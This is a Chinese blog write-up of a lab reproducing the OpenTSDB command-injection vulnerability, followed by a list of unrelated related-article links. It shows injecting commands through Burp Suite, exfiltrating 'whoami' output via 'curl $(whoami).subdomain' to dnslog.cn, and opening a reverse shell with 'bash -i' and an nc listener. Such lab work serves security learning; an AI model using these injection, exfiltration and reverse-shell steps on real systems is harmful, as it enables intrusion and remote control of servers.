当前位置: 首页 > news >正文

OpenTSDB(CVE-202035476)漏洞复现及利用

任务一:
复现环境中的命令注入漏洞。
任务二:
利用命令注入执行whoami,使用DNS外带技术获取结果
任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。

任务一:
1.搭建好环境
在这里插入图片描述
在这里插入图片描述
2.先去了解一下这个网站的功能
在这里插入图片描述
在这里插入图片描述
3.首先查看存在的metric,发现在这里是0
在这里插入图片描述
4.我们写入一个metric,首先利用burpsuite进行抓包然后用post请求添加请求体加入metric,然后我们再次查看metrics发现我们已经成功写入一个metric。
在这里插入图片描述
在这里插入图片描述
5.然后进行代码执行漏洞,在tmp下创建一个success文件,得到回显

在这里插入图片描述

在这里插入图片描述
6.然后进入容器中查看(一定要查看创建的文件路径,其他的包含任何的都不是,因为这个找了好久好久,其实很早就做出来了,还以为做错了,无语死了)。

在这里插入图片描述
任务二:
1.直接把输出的whoami重定向到1.txt文件里面(中间要用%20作为空格,不然会失败,因为这个卡了好久,看到burpsuite的颜色那里不对了)

在这里插入图片描述
2.查看1.txt文件,发现我是root。
在这里插入图片描述

3.如果是利用DNS外带技术获得结果的话
首先登入dnslog.cn,然后点击get subdomain获得专属的子域名。
在这里插入图片描述
4.然后使用curl $(whoami).子域名,然后上面回显的时候出现了(root.子域名),得到(这里有一个问题,最开始用的ping,一直没ping通,不知道为啥)
在这里插入图片描述
任务三:
1.用(bash -c “bash -i ·········“)
在这里插入图片描述
2.这里试了很久自己的反弹shell都不成功,然后试了很多次,先是把端口打开了,用ufw添加端口 ufw allow +端口,然后把自己的nc变成了 nc -lvp +端口,然后再sec一次,反弹成功了。
在这里插入图片描述

在这里插入图片描述

http://www.lryc.cn/news/250111.html

相关文章:

  • Maven无法拉取依赖/构建失败操作步骤(基本都能解决)
  • 【数据库】数据库并发控制的目标,可串行化序列的分析,并发控制调度器模型
  • 带头结点的双向循环链表
  • 2023年11月下旬大模型新动向集锦
  • 有IP没有域名可以申请证书吗?
  • 【软件推荐】卸载360软件geek;护眼软件flux;
  • Module build failed: Error: ENOENT: no such file or directory
  • Postgresql BatchInsert唯一键冲突及解决
  • 腾讯云AMD服务器标准型SA5实例AMD EPYC Bergamo处理器
  • 力扣 --- 加油站
  • C++基础 -25- 动态多态
  • 数据库-MySQL之数据库必知必会17-21章
  • mysql主从复制-redis集群扩容缩容、缓存优化(缓存更新策略、穿透,击穿,雪崩)、mysql主从搭建、django实现读写分离
  • docker部署kerberos,群晖nas中nfs开启kerberos校验
  • 【前端】数据行点击选择
  • 网络安全技术
  • 这几款 idea 插件让效率起飞!
  • [FUNC]判断窗口在哪一个屏幕上
  • Vue语音播报,不用安装任何包和插件,直接调用。
  • 公网穿透和RTC
  • uniapp 使用web-view外接三方
  • SQL Sever 复习笔记【一】
  • 外贸平台信息群发脚本的优势!
  • 一文打尽相机单目标定(远心,沙姆镜头)
  • 基于springboot+vue的秒杀商城(前后端分离)
  • C++-火车编组
  • kafka学习笔记(一)--脑裂
  • 一看就懂的RxJava源码分析
  • halcon中灰度图自动二值化
  • Mybatis-Plus实体类注解怎么用